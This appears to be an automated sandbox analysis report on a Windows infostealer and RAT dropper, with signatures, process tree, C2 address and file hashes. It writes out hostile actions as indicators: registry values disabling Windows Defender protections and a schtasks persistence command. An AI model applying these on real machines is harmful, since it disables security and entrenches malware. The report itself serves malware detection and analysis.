Malware Analysis Report

2025-06-16 03:29

Sample ID 230506-1v8axsac24
Target 5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.bin
SHA256 5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4
Tags
amadey evasion persistence trojan asyncrat redline stormkitty default discovery infostealer rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4

Threat Level: Known bad

The file 5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.bin was found to be: Known bad.

Malicious Activity Summary

amadey evasion persistence trojan asyncrat redline stormkitty default discovery infostealer rat spyware stealer

StormKitty

Detects Redline Stealer samples

RedLine

Modifies Windows Defender Real-time Protection settings

Amadey

AsyncRat

StormKitty payload

Async RAT payload

Downloads MZ/PE file

Checks computer location settings

Windows security modification

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Accesses 2FA software files, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops desktop.ini file(s)

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Runs ping.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Creates scheduled task(s)

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-06 21:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-06 21:59

Reported

2023-05-06 23:42

Platform

win7-20230220-en

Max time kernel

245s

Max time network

332s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe"

Signatures

Amadey

trojan amadey

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 668 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 668 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 668 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 668 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 668 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 668 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 668 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 580 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 580 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 580 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 580 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 580 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 580 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 580 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 1800 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 1800 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 1800 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 1800 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 1800 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 1800 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 1800 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 632 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 632 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 632 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 632 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 632 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 632 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 632 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 632 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 632 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 632 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 632 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 632 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 632 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 632 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 1800 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 1800 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 1800 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 1800 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 1800 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 1800 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 1800 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 1608 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 1608 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 1608 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 1608 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 1608 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 1608 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 1608 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 1616 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1616 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1616 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1616 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1616 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1616 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1616 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe

"C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe" /F

Network

Country Destination Domain Proto
N/A 185.161.248.72:38452 tcp
N/A 185.161.248.72:38452 tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

MD5 cb7724f0cfbc465a48b1832d3419edd7
SHA1 f8553bffe63bbc454ef98c6c1ec3736b9e0a81aa
SHA256 0a77eec7259fe2048bd127f7be7af966085f73415221dd04457713348393b940
SHA512 f646e478eacb637adb358d6d3a367259de84b078465656a77f62e9d0b7443589ddfd79138730ae317649d0a1cc2b7b89a5d0c30b7f083c25671dd57c6881e933

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

MD5 cb7724f0cfbc465a48b1832d3419edd7
SHA1 f8553bffe63bbc454ef98c6c1ec3736b9e0a81aa
SHA256 0a77eec7259fe2048bd127f7be7af966085f73415221dd04457713348393b940
SHA512 f646e478eacb637adb358d6d3a367259de84b078465656a77f62e9d0b7443589ddfd79138730ae317649d0a1cc2b7b89a5d0c30b7f083c25671dd57c6881e933

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

MD5 cb7724f0cfbc465a48b1832d3419edd7
SHA1 f8553bffe63bbc454ef98c6c1ec3736b9e0a81aa
SHA256 0a77eec7259fe2048bd127f7be7af966085f73415221dd04457713348393b940
SHA512 f646e478eacb637adb358d6d3a367259de84b078465656a77f62e9d0b7443589ddfd79138730ae317649d0a1cc2b7b89a5d0c30b7f083c25671dd57c6881e933

\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

MD5 cb7724f0cfbc465a48b1832d3419edd7
SHA1 f8553bffe63bbc454ef98c6c1ec3736b9e0a81aa
SHA256 0a77eec7259fe2048bd127f7be7af966085f73415221dd04457713348393b940
SHA512 f646e478eacb637adb358d6d3a367259de84b078465656a77f62e9d0b7443589ddfd79138730ae317649d0a1cc2b7b89a5d0c30b7f083c25671dd57c6881e933

\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

MD5 2c370254d2b62b9fa0a22d82556bb9db
SHA1 98dd76e9e34d752e6110a70e514f8dc94e914ebd
SHA256 ecbed5e995e73dd69c417d6a3a422f3c93d1149c6a8acbed56f181535208463b
SHA512 9d0aab28dd1c4865053fd9995ded31ca14da398d2c407b46253f10abe079159fb9cace32312e25402463a24b727930db0edefebe5b8da9d57ac4493603845843

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

MD5 2c370254d2b62b9fa0a22d82556bb9db
SHA1 98dd76e9e34d752e6110a70e514f8dc94e914ebd
SHA256 ecbed5e995e73dd69c417d6a3a422f3c93d1149c6a8acbed56f181535208463b
SHA512 9d0aab28dd1c4865053fd9995ded31ca14da398d2c407b46253f10abe079159fb9cace32312e25402463a24b727930db0edefebe5b8da9d57ac4493603845843

\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

MD5 2c370254d2b62b9fa0a22d82556bb9db
SHA1 98dd76e9e34d752e6110a70e514f8dc94e914ebd
SHA256 ecbed5e995e73dd69c417d6a3a422f3c93d1149c6a8acbed56f181535208463b
SHA512 9d0aab28dd1c4865053fd9995ded31ca14da398d2c407b46253f10abe079159fb9cace32312e25402463a24b727930db0edefebe5b8da9d57ac4493603845843

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

MD5 2c370254d2b62b9fa0a22d82556bb9db
SHA1 98dd76e9e34d752e6110a70e514f8dc94e914ebd
SHA256 ecbed5e995e73dd69c417d6a3a422f3c93d1149c6a8acbed56f181535208463b
SHA512 9d0aab28dd1c4865053fd9995ded31ca14da398d2c407b46253f10abe079159fb9cace32312e25402463a24b727930db0edefebe5b8da9d57ac4493603845843

\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

MD5 2013df3ab4c393dbfeb56100e4c414a6
SHA1 1a0e09673ca2c1e3bfd7b5ed5e03cead327f3ac2
SHA256 1081bd699d986ef6b0fc0d99c1dbb1c26bdfacc89249078e611c3cba538bd878
SHA512 7bd1d58142e9b9346096b297fa286f1bf7f161e246caa27774255e91416357de9b481675fc9f63430b2dd399758521166130e7f3ce590bfc2462a3e28d0b15fb

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

MD5 2013df3ab4c393dbfeb56100e4c414a6
SHA1 1a0e09673ca2c1e3bfd7b5ed5e03cead327f3ac2
SHA256 1081bd699d986ef6b0fc0d99c1dbb1c26bdfacc89249078e611c3cba538bd878
SHA512 7bd1d58142e9b9346096b297fa286f1bf7f161e246caa27774255e91416357de9b481675fc9f63430b2dd399758521166130e7f3ce590bfc2462a3e28d0b15fb

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

MD5 2013df3ab4c393dbfeb56100e4c414a6
SHA1 1a0e09673ca2c1e3bfd7b5ed5e03cead327f3ac2
SHA256 1081bd699d986ef6b0fc0d99c1dbb1c26bdfacc89249078e611c3cba538bd878
SHA512 7bd1d58142e9b9346096b297fa286f1bf7f161e246caa27774255e91416357de9b481675fc9f63430b2dd399758521166130e7f3ce590bfc2462a3e28d0b15fb

\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

MD5 2013df3ab4c393dbfeb56100e4c414a6
SHA1 1a0e09673ca2c1e3bfd7b5ed5e03cead327f3ac2
SHA256 1081bd699d986ef6b0fc0d99c1dbb1c26bdfacc89249078e611c3cba538bd878
SHA512 7bd1d58142e9b9346096b297fa286f1bf7f161e246caa27774255e91416357de9b481675fc9f63430b2dd399758521166130e7f3ce590bfc2462a3e28d0b15fb

\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

MD5 6bb86793dc581b29147c2d4d5bad8ce6
SHA1 c5ffe67ea0f190d661779969a5da2b843e9eaf6d
SHA256 ccf25cf1cb0269655e2003b30ed9fdc3d0225bb49b91bc301978e809bcf517bd
SHA512 376e2188605a7c9f9d69a01960b2ff2554060adc7b254ba5c827be86b3e100b628abe281231d09d29e85ba8230f2f08be4d41b0a035da6914bfeec8994559d52

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

MD5 6bb86793dc581b29147c2d4d5bad8ce6
SHA1 c5ffe67ea0f190d661779969a5da2b843e9eaf6d
SHA256 ccf25cf1cb0269655e2003b30ed9fdc3d0225bb49b91bc301978e809bcf517bd
SHA512 376e2188605a7c9f9d69a01960b2ff2554060adc7b254ba5c827be86b3e100b628abe281231d09d29e85ba8230f2f08be4d41b0a035da6914bfeec8994559d52

\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

MD5 6bb86793dc581b29147c2d4d5bad8ce6
SHA1 c5ffe67ea0f190d661779969a5da2b843e9eaf6d
SHA256 ccf25cf1cb0269655e2003b30ed9fdc3d0225bb49b91bc301978e809bcf517bd
SHA512 376e2188605a7c9f9d69a01960b2ff2554060adc7b254ba5c827be86b3e100b628abe281231d09d29e85ba8230f2f08be4d41b0a035da6914bfeec8994559d52

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

MD5 6bb86793dc581b29147c2d4d5bad8ce6
SHA1 c5ffe67ea0f190d661779969a5da2b843e9eaf6d
SHA256 ccf25cf1cb0269655e2003b30ed9fdc3d0225bb49b91bc301978e809bcf517bd
SHA512 376e2188605a7c9f9d69a01960b2ff2554060adc7b254ba5c827be86b3e100b628abe281231d09d29e85ba8230f2f08be4d41b0a035da6914bfeec8994559d52

memory/1672-94-0x00000000005E0000-0x00000000005FA000-memory.dmp

